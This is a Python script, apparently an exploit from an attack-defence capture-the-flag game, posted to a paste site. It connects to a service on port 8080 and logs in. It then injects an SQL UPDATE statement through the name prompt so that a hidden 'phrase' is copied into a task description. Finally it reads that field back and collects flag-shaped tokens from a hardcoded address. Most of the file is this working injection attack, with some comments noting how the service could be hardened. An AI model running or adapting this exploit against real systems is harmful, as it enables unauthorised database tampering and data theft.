
Untitled

a guest Oct 21st, 2018 66 Never
  1. import socket
  2. import re
  3.  
# Neither `timeout` nor `except_list` is referenced elsewhere in this file;
# presumably both are read by whatever harness imports this module -- confirm.
timeout = 5
except_list = []

# A flag is a lowercase, UUID-shaped token: hex groups of 8-4-4-4-12 digits.
# The pattern is unanchored, so it matches anywhere inside a longer reply.
FLAG_FORMAT = "-".join("[0-9a-f]{%d}" % width for width in (8, 4, 4, 4, 12))
  8.  
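def _send_line(sock, text):
    """Send *text* plus a trailing newline, encoded as UTF-8."""
    sock.sendall((text + '\n').encode())


def _connect(ip):
    """Open a TCP connection to the service on port 8080.

    The module-level ``timeout`` is applied so a silent peer cannot block
    the script forever.
    NOTE(review): assumes ``timeout`` is meant as a seconds budget -- confirm.
    """
    return socket.create_connection((ip, 8080), timeout=timeout)


def _login(ip, name, limit):
    """Connect and answer the first two prompts with *name*.

    Returns ``(sock, raw_reply)``; the caller owns ``sock`` and must close it.
    The socket is closed here if the exchange fails part-way.
    """
    sock = _connect(ip)
    try:
        sock.recv(limit)
        _send_line(sock, name)
        sock.recv(limit)
        _send_line(sock, name)
        raw_reply = sock.recv(limit)
    except Exception:
        sock.close()
        raise
    return sock, raw_reply


def attack(ip, storage):
    """Run the three-connection exchange against *ip* and collect flags.

    What the script relies on (useful when hardening the service): the
    statement sent in the second connection is delivered as the answer to
    the *first* prompt, so it only has an effect if the service builds its
    SQL by concatenating that input. Binding the value as a query parameter,
    and denying the login path's database role UPDATE rights on ``tasks``,
    removes the condition this script depends on.

    Args:
        ip: address of the service; port 8080 is fixed.
        storage: opaque value handed back unchanged to the caller.

    Returns:
        ``(matches, storage)`` where ``matches`` is the list of
        ``FLAG_FORMAT`` hits found in the final reply.

    Raises:
        OSError: on connection failure or socket timeout.

    NOTE(review): every ``recv(limit)`` is treated as one complete prompt;
    TCP gives no such guarantee, so a split reply desynchronises the dialogue.
    """
    limit = 1024
    name = 'k'

    # Connection 1: obtain a working account and read the newest task id.
    sock, raw_reply = _login(ip, name, limit)
    try:
        reply = raw_reply.decode()
        # NOTE(review): this retry loop has no upper bound; a service that
        # always answers 'Incorrect' keeps it reconnecting indefinitely.
        while 'Incorrect' in reply:
            sock.close()
            name += 'k'
            sock, raw_reply = _login(ip, name, limit)
            reply = raw_reply.decode()
        print('correct')
        if 'role?' in reply:
            _send_line(sock, 'r')
        sock.recv(limit)
        print('get')
        _send_line(sock, '1')
        reply = sock.recv(limit).decode()
        # Last space-separated token of the reply, used verbatim below.
        # NOTE(review): not stripped or validated -- confirm the reply ends
        # with the bare id.
        last_task = reply.split(' ')[-1]
        sock.recv(limit)
    finally:
        sock.close()

    # Connection 2: the first prompt receives the SQL text instead of a name.
    statement = (
        "'; UPDATE tasks SET(description) = (SELECT phrase FROM tasks WHERE id = "
        + last_task + ") WHERE id = " + last_task + "; -- "
    )
    with _connect(ip) as sock:
        sock.recv(limit)
        _send_line(sock, statement)
        sock.recv(limit)
        _send_line(sock, name)
        sock.recv(limit)

    # Connection 3: log in normally and read the task back.
    sock, _ = _login(ip, name, limit)
    with sock:
        _send_line(sock, '1')
        sock.recv(limit)
        _send_line(sock, last_task)
        matches = re.findall(FLAG_FORMAT, sock.recv(limit).decode())
    return (matches, storage)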
  72.  
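if __name__ == "__main__":
    # Guarded so that importing this module (for example from a harness that
    # calls attack() itself) does not open network connections as a side
    # effect; running the file directly behaves as before.
    print(attack('10.218.15.2', 'null')[0])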